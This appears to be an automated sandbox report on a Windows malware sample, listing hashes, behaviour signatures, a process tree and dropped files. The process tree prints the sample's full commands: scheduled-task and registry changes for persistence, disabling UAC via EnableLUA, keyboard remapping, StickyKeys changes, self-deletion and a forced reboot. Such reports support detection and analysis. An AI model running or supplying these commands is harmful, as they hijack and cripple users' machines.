Analysis

  • max time kernel
    33s
  • max time network
    40s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02/03/2024, 16:47

Errors

Reason
Machine shutdown

General

  • Target

  • Size

    315KB

  • MD5

    9f8bc96c96d43ecb69f883388d228754

  • SHA1

    61ed25a706afa2f6684bb4d64f69c5fb29d20953

  • SHA256

    7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

  • SHA512

    550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

  • SSDEEP

    6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2168
    • C:\Users\Admin\AppData\Local\system.exe
      "C:\Users\Admin\AppData\Local\system.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Users\Admin\AppData\Local\del.bat
        3⤵
        • Deletes itself
        PID:3000
      • C:\Windows\SysWOW64\SCHTASKS.exe
        C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:2608
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          4⤵
          • Modifies WinLogon for persistence
          PID:2684
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          4⤵
          • Adds Run key to start application
          PID:2624
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
          4⤵
            PID:2472
        • C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2428
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
            4⤵
              PID:2404
          • C:\windows\SysWOW64\cmd.exe
            C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2640
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
              4⤵
                PID:2840
            • C:\windows\SysWOW64\cmd.exe
              C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2416
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                4⤵
                • UAC bypass
                PID:2808
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
              3⤵
                PID:2096
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                  4⤵
                    PID:1260
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
                  3⤵
                    PID:1608
                    • C:\Windows\SysWOW64\shutdown.exe
                      shutdown -r -t 10 -f
                      4⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1768
              • C:\Windows\explorer.exe
                "C:\Windows\explorer.exe"
                1⤵
                  PID:1672
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                  1⤵
                  • Checks processor information in registry
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of SetWindowsHookEx
                  PID:2788
                  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
                    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
                    2⤵
                    • Enumerates system info in registry
                    • Modifies Internet Explorer settings
                    • Modifies registry class
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious use of SetWindowsHookEx
                    PID:2848
                • C:\Windows\system32\LogonUI.exe
                  "LogonUI.exe" /flags:0x0
                  1⤵
                    PID:844
                  • C:\Windows\system32\LogonUI.exe
                    "LogonUI.exe" /flags:0x1
                    1⤵
                      PID:2252

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\del.bat

                            Filesize

                            76B

                            MD5

                            dda69d69d2bf9994650f6c0df260fd80

                            SHA1

                            94041b483a3b0cda19339bddf09f1bd1b2242fea

                            SHA256

                            a2126c0c0b9d7401a20582ada62be413320cebb86dff164e5cb91bec7b6aa898

                            SHA512

                            7e70d053cd60110011844a699eba9a25065cdb2827fd72f379a67f479eb2ddc346223c39e3c2781dc16b8e07915737aba513b5eae57d38e88d46eae318a579ac

                          • C:\Users\Admin\Documents\1.R5A

                            Filesize

                            11KB

                            MD5

                            efb59856d6da6005405673e22c81eb68

                            SHA1

                            d34dcc9df9c4f8b172a9e43c204ee38a2a5febe6

                            SHA256

                            17f29595124e30cf515a8fe04239437b32f6a0edbcbd22bcfb373be3bd2fbc23

                            SHA512

                            71898e1fc305f5d992bcf7949eabf3ad52290df29a3742ebbabccae407ba2b676fb6e74a8c5c1867be501ad6d22c46780d45e8d3befecbc2f502d76d4834ffa2

                          • C:\Users\Admin\Documents\2.R5A

                            Filesize

                            11KB

                            MD5

                            b53435b65e8e54e8ef0821ef8fc18858

                            SHA1

                            a2875aa6726884bbd8a6b7662cf1ea4a132471b4

                            SHA256

                            fe6a36cf7c5426a71dd305cba3e45fe3e069e6a951a9880dc6110f7604b8f11f

                            SHA512

                            5ed6f091f3a9f97a7c024fd8e2b720380c6310d533e53acecf08ecc6ee9f03a7b54290921bea9adee917de72ff9f707c21d2b3096c8e290579dba2adf90a28d8

                          • C:\Users\Admin\Documents\3.R5A

                            Filesize

                            572KB

                            MD5

                            89599fa9cbfe8f76bc01aece893ea69b

                            SHA1

                            9a2d1dd8a60065895c9f126c71c21630b430cc3d

                            SHA256

                            4885851edadb2bc1c4063844d884c3228e473e2848bfc345e4584d4fdd61c11f

                            SHA512

                            9e9cdde83441b0f86dd373a8c3cedaedefd1e2f1cac6b6c5baba52d158c7c8eb7a13d06a149659698a67bc661cdbe3b57ee2bb5586c2332e36eae99792085eaa

                          • C:\Users\Admin\Documents\4.R5A

                            Filesize

                            260KB

                            MD5

                            7750c2660e1280ec6ca5afeff98bff57

                            SHA1

                            321429544fee0518119a8a501dc304f181dfba49

                            SHA256

                            f59ac0811b36edf973f14cfbdb43af2f4efe03ac5cff231ec76b0e43e5f2fb55

                            SHA512

                            982ee3a5c9d37b64572b1772eb748997c878e9d5ae7a3d1748b48c94c9b71fe63dc52d4c3edd7e74c462f7a33f763b0bd49fa10ca833dafd65912c582b051e51

                          • C:\Users\Admin\Documents\5.R5A

                            Filesize

                            11KB

                            MD5

                            cfaf5a3cfd727880ffa9cad8378ab27d

                            SHA1

                            95adbd2fcf96e714925d6d1033777f318c36cc86

                            SHA256

                            8a7df45e942d65a653f36662528974c36791687d4f3fcfc976378eb424b38432

                            SHA512

                            447dcb4ff4cbe06db57bfcc0c61da1ebf5501805f0664f35ca42e9c28f658ae840adf3a264f276a349b39caa23b845b09b1a5bf3a1345ca6ecae473fc9b74304

                          • C:\Users\Admin\Documents\6.R5A

                            Filesize

                            11KB

                            MD5

                            b6044f65a414faae440f08df3e0d5e0e

                            SHA1

                            5e81f3df21e1a71b6b2f8a92ac5b5d8944325d40

                            SHA256

                            53ce41885b9d87a9f8ebd67f00dceeadf289f3eeaf4e48b7c95f8f63fa7c9393

                            SHA512

                            45e87e59279e6918c016f5bc5086a67ec17b9647c5fcfa6fbd47dfb213f78261aa40c80a0316979db5e74012a9de1f9b0a221a6209b27a33ebb6ff068d371c27

                          • C:\Users\Admin\Documents\7.R5A

                            Filesize

                            11KB

                            MD5

                            8a83a64796f007abba309dedb7e2e0a5

                            SHA1

                            83452d93d7120f82d6b0a7b8b225ba6d1e736ed2

                            SHA256

                            8143db1d3a9d172bce528a3e4bdc10651835b37665c298fc815f5b517084de82

                            SHA512

                            d0d2008242da1eecc45fec5673c8dbf8a189060f015968bc69d730fba8bc1a937d3e356dedf46b8bd0e6902d88ffe0d3232804f2b2bf297f86a26a509f3b3148

                          • C:\Users\Admin\Documents\8.R5A

                            Filesize

                            396KB

                            MD5

                            b897695f2a141ad5d4d3a43689995766

                            SHA1

                            6481798f95fdb9b2515ac53ba61b3a7ffc67b868

                            SHA256

                            58b7bcb5e872ef7ad1582de1c669d6ed419ced828bbd0cd7eff7f3081f62fc20

                            SHA512

                            dce5e9c8ff98770513245022bac85ba8babb6838e13c5503e50d6eb2530cacfb208ba19784dbd701a2c2a0a3ef68119b824ddb2b3810829847f2e1bc0a5ee969

                          • \Users\Admin\AppData\Local\system.exe

                            Filesize

                            315KB

                            MD5

                            51edf9d3b666b2ac9ba583912315a599

                            SHA1

                            fe4e5afd2efa7276d18899b06c1608b1dc049aef

                            SHA256

                            2ca106b9f12b26929f660342133f6bed9ebe019480a587249408bd5523725ac7

                            SHA512

                            82c255417e1c61f71380f02298c81f89811817a9a275d8e41a0137fb823922f74643a6d2cbd0f61cc50c259d6be4af1b01c66e59ee1ebc2c3ebfe38bf8feb0b4

                          • memory/844-123-0x00000000029C0000-0x00000000029C1000-memory.dmp

                            Filesize

                            4KB

                          • memory/2252-126-0x00000000026E0000-0x00000000026E1000-memory.dmp

                            Filesize

                            4KB

                          • memory/2788-102-0x0000000003640000-0x0000000003650000-memory.dmp

                            Filesize

                            64KB

                          • memory/2788-101-0x0000000003630000-0x0000000003631000-memory.dmp

                            Filesize

                            4KB

                          • memory/2848-121-0x000000005FFF0000-0x0000000060000000-memory.dmp

                            Filesize

                            64KB

                          • memory/2848-122-0x0000000071D1D000-0x0000000071D28000-memory.dmp

                            Filesize

                            44KB

                          • memory/2848-124-0x000000005FFF0000-0x0000000060000000-memory.dmp

                            Filesize

                            64KB

                          • memory/2848-125-0x0000000071D1D000-0x0000000071D28000-memory.dmp

                            Filesize

                            44KB